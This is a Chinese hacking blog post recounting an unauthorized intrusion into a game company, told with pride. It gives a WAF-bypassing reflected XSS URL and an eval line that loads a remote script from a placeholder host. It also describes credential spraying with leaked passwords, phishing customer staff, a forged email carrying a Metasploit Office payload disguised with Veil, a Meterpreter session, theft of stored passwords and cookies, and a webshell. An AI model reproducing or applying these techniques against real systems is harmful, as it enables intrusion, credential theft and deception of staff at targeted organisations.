反射型XSS的逆袭之路

0×00背景

这是一次结合各自技巧的渗透过程，由于原作者的截图不多，我们只是简单叙述一下思路~

目标是一家本地的游戏公司，起因是找到一个反射型xss，但是却被对方公司忽略，而作者身边的一个妹子也在这家公司工作，便起了搞定这家公司的决心。

以下正片

=====================================================

0×01信息收集

目标公司：XX网络科技有限公司（XX游戏）

URL：http://www.xxxxcom.com

http://www.xxxxcom.cn（公司另一域名）

http://www.xxxxcom.cn.com（公司另一域名）

通过浏览主站和查询whois信息，得知其公司工作邮箱，域名所有人信息，HR联系方式等

结合社工库查询，综合得到目标公司一高管信息

工作邮箱直接查询到了密码，但是输入后提示密码错误，看来修改过，但仔细一看，均为有规律的弱口令

三个数字重复或者是键盘向下的方式组合的口令，于是我果断的决定根据这个规律碰撞一下其他密码试试

经过碰撞，把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面（本来想登录邮箱的，无奈网易有防止重复提交的策略）

跑了好一阵子，未果，碰撞密码，暂时搁浅

后来想起，whois信息中，域名是xinnet的，于是开心的去查询新网的裤子，不过查询结果很失望，密码依旧不对

至此第一次试探搁浅

0×02对目标网站的测试

目标站点进行cms指纹识别后反应是良精南方的，但是看了看用的是.net的 架构，想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞，于是乎又折头看了看，shell已删除，并且管理后台重做过，去年是用的 admin.xxxxcom.com做的后台，现在看了看已经重做，只能放弃，不过好在菜刀还有缓存，通过缓存浏览了web目录下的大概情况，有个 bbs，一个前台，一个主站，均为.net架构，论坛更是Discuz!NT 3.6.711 出名的难日，浏览缓存后发现某目录下存在一富文本编辑器，访问后结果依旧不尽人意

果断放弃之，然后看了看去年找到的一个主站sql注入

装了新的安全狗，无力去继续绕过waf，放弃=。=

唔，那怎么办呢，接下来就对目标站点进行了FUZZ扫描，哟~好吧，就只扫到我之前说的那个xss，还是反射型的，不过突然想到目标公司的人说不就是个跨站么，这句话让我又不开心了起来，哥今天就拿这个屌丝反射型跨站逆袭给你看！

0×03反射型xss的逆袭之路（伪水坑攻击）

因为装了安全狗，所以要稍微进行攻击代码构造绕过一下

该反射构造的代码如下：

1	http://www.xxxxcom.com/UserRegister1.aspx?s=%22%3E%3CiMg%20src=N%20onerror=alert%28/test/%29%3E

通过img标签构造iMg大小写的方式绕过，用onerror属性加 载，

1	onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)

对eval操纵的内容进行16进制编码后测试通过

之后进行了第一次攻击尝试

找到客服反馈问题，我说你们游戏的注册页面有问题啊，没办法注册，注册的地址是不是这个啊（然后发了经过短域名处理的攻击url）

一般情况，客服都会来解决问题，但是该公司客服非常奇葩。。。说：哦，我也不知道啊，要不你下载个客户端去注册吧。

经过我机智的对话，仍然没有让其点击连接（给客服大爷您跪了）

第一次水坑攻击尝试失败。。暂时搁浅

91ri.org注：所谓“水坑攻击”，是指黑客通过分析被攻击者的网络活动规律，寻找被攻击者经常访问的网站的弱点，先攻下该网站并植入攻击代码，等待被攻击者来访时实施攻击。文中只是将xss发送到对方那边，等待对方点击，实际上是不能称为水坑攻击的，只能算钓鱼？？

0×04第二次信息收集

首次尝试接连受挫，我过了几天在群里打屁，正好那个在这家公司上班的妹子也在，我就顺口问了问公司的情况

大概收集到信息为：

公司员工办公电脑均为win7，文字处理软件有office和wps但是默认使用的是office，公司并没有规定统一

不过好消息是office是默认的，以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切

做了个简易的接收端，探测公司那边的组件和杀毒软件

通过骗取点击后，接收端收到了session的信息，现在掌握的信息为：office版本为2007，浏览器为IE8，杀毒软件360，以及IP出口

0×05最后的冲锋，反射型xss终于逆袭

一切基本就绪，天随人愿的是我这里正好也有公网ip

但是有360略蛋疼，不过上次听maple说veil比较牛逼，我office用的payload自然是来自msf，那么就结合veil碰碰运气吧。。

找了个fake-email发伪造邮件

大概内容就是一篇求职的，附带了doc，doc里带了msf生成的

为了保险起见，除了附件有doc外，我还在邮件内容里加了经过短域名处理的xss攻击连接

邮件发过去了，一直开着msf等消息，不过貌似人家周日的时候不上班

吓的我一直开着电脑，第二天大概十点过，msf这边有动静了，好吧，可以返回Meterpreter会话了，总算是摸到了目标公司的设备（尽管只是一台个人电脑）

不过运气真不错，不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开，反正会话是反弹到了，快速的翻了翻对方的盘符，在文档里找到一份对应用户密码的记录，type了一下快速记录下来后把马删了撤退走人(91ri.org:把账号密码存在本机简直是硬伤啊)

好消息一个接着一个，之前在邮件内容中写入的短域名xss也被触发了，果断用其cookie登录，不过比较可惜，因为是反射型，对方后台找不到，只登录了前台

通过前台并没有进入后台的地方，但是论坛和前台互通，所以，嘿嘿~~是个超级版主

0×06尾声

之后的事情就不用说了，shell到手，对应用户密码也在个人电脑上扒拉到，呵呵~

最后我溜达了一圈，把shell删了，走人，只为证明反射型xss也是可以屌丝逆袭高富帅的！

写下这篇文章，默默抽根手边的花玉溪，深藏功与名

强调:自本文发出之前，目标服务器和对方电脑的木马均已删除，本人并未做任何破坏

来自：91ri.org